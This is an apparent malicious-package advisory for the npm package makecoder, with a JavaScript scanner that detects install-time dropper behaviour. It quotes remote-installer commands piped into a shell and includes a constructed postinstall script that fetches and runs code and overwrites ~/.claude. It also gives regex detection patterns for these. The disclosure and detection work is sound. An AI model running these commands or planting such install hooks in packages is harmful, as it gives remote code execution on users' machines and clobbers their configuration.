
MAL-2026-4790

Malicious code in makecoder (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e0137a523475bcb007059cff32df9ab8c2d8facb91e0d4d6326189e51c6b7b2b)

`scripts/postinstall.js` runs automatically on `npm install` and, when `bun` is not already present, executes `curl -fsSL https://bun.sh/install | bash` on Unix or `powershell -Command "irm bun.sh/install.ps1 | iex"` on Windows.

The fetched installer is unpinned (no version, no checksum, no signature verification), is served from a third-party domain (`bun.sh`) that does not match the package's publisher, and is piped directly into a shell interpreter. The package then uses the freshly installed `bun` runtime to execute the bundled `dist/cc.mjs`: the alternate-runtime-dropper shape, in which a Node package pulls a second language runtime at install time and uses it to run sibling code, evading scanners that only inspect Node-resolved code paths.

Whoever controls bun.sh (or any TLS MITM on the install path, or a future compromise of that domain) gains arbitrary code execution on every installer's machine. None of this behavior is documented in the README.

The postinstall script additionally force-copies the package's `claude/` directory recursively over the user's `~/.claude/` configuration directory, clobbering any pre-existing Claude Code command/MCP customizations without prompting. This is a secondary concern relative to the remote-code-execution path above.
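The install-time shape described above can be checked statically before `npm install` is allowed to run it. The following JavaScript is an added example, not code from this advisory, from Amazon Inspector, or from the makecoder package: it scans a package manifest for lifecycle hooks, then inspects the hook command and the package files it names for remote content piped into a shell, a second runtime executing sibling code, and recursive copies into the home directory, and finally flags any fetched host the README never mentions. The `package.json`, `scripts/postinstall.js` and README it scans are constructed stand-ins written to mirror the advisory's description (they are not the package's real files), and the rule identifiers and function names are this example's own.

```javascript
// Added example: static detection of install-time dropper behaviour in an npm
// package. Assumptions: inputs are the parsed package.json object, a map of
// relative path -> file text for the package, and the README text.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each rule is applied to the hook command and to every package file it names.
const RULES = [
  // `curl ... | bash`, `wget ... | sh`: remote bytes executed before anyone reads them.
  { id: 'remote-pipe-to-shell',
    re: /\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b/ },
  // PowerShell equivalent: `irm <url> | iex`.
  { id: 'remote-pipe-to-shell',
    re: /\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|\n]*\|\s*(?:iex|Invoke-Expression)\b/i },
  // A second runtime used to run a sibling script (command-string form).
  { id: 'alternate-runtime-exec',
    re: /\b(?:bun|deno|python3?|ruby|perl)\b(?:\s+run)?\s+[\w./-]+\.(?:m?js|c?js|ts|py|rb|pl)\b/ },
  // Same thing through an argv array: spawn('bun', ['dist/x.mjs']).
  { id: 'alternate-runtime-exec',
    re: /\b(?:spawn|spawnSync|execFile|execFileSync)\s*\(\s*['"](?:bun|deno|python3?|ruby|perl)['"]\s*,\s*\[[^\]]*\.(?:m?js|c?js|ts|py|rb|pl)\b/ },
  // Recursive copy into the user's home directory from an install hook.
  { id: 'home-dir-overwrite',
    re: /(?:cpSync|copySync|cp\s+-[A-Za-z]*r|Copy-Item)[^\n]*(?:os\.homedir\(\)|~\/|\$HOME|process\.env\.HOME|\$env:USERPROFILE)/ },
];

function scanPackage(pkg, files, readme = '') {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    findings.push({ rule: 'lifecycle-script', where: `scripts.${hook}`, evidence: cmd });
    // Inspect the command line itself plus any package file it references.
    const targets = [{ where: `scripts.${hook}`, text: cmd }];
    for (const tok of cmd.split(/\s+/)) {
      const rel = tok.replace(/^\.\//, '');
      if (Object.prototype.hasOwnProperty.call(files, rel)) targets.push({ where: rel, text: files[rel] });
    }
    for (const { where, text } of targets) {
      for (const rule of RULES) {
        const m = rule.re.exec(text);
        if (m) findings.push({ rule: rule.id, where, evidence: m[0].trim() });
      }
    }
  }
  // Hosts contacted at install time that the README never mentions.
  const hosts = new Set();
  for (const f of findings) {
    if (f.rule !== 'remote-pipe-to-shell') continue;
    const urls = f.evidence.match(/https?:\/\/[^\s'"|]+|\b[\w.-]+\.[a-z]{2,}\/[^\s'"|]*/gi) || [];
    for (const u of urls) hosts.add(u.replace(/^https?:\/\//, '').split('/')[0].toLowerCase());
  }
  for (const host of hosts) {
    if (!readme.toLowerCase().includes(host)) {
      findings.push({ rule: 'undocumented-install-download', where: 'README', evidence: host });
    }
  }
  return findings;
}

// Constructed sample package mirroring the advisory's description (not the real files).
const SAMPLE_PACKAGE_JSON = { name: 'makecoder', scripts: { postinstall: 'node scripts/postinstall.js' } };
const SAMPLE_README = '# makecoder\n\nRun `npx makecoder` to scaffold a project.\n';
const SAMPLE_FILES = {
  'scripts/postinstall.js': `
const { execSync } = require('child_process');
const fs = require('fs'); const os = require('os'); const path = require('path');
let haveBun = true;
try { execSync('bun --version', { stdio: 'ignore' }); } catch (e) { haveBun = false; }
if (!haveBun) {
  if (process.platform === 'win32') {
    execSync('powershell -Command "irm bun.sh/install.ps1 | iex"', { stdio: 'inherit' });
  } else {
    execSync('curl -fsSL https://bun.sh/install | bash', { stdio: 'inherit' });
  }
}
fs.cpSync(path.join(__dirname, '..', 'claude'), path.join(os.homedir(), '.claude'), { recursive: true, force: true });
execSync('bun dist/cc.mjs', { stdio: 'inherit' });
`,
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES, SAMPLE_README), null, 2));
```

Run it with `node`; to audit a real dependency tree, feed it each `node_modules/*/package.json` together with the files its hooks name. The rules are literal patterns and are meant as a first pass: a hook that builds the command from pieces or fetches the installer through an HTTP client evades them, so the blanket control remains `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) followed by a deliberate review of any package that claims to need an install hook.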


Affected packages

npm / makecoder

No fixed version has been published for makecoder (npm). Pin to a version you have verified as safe, or switch to an alternative.

References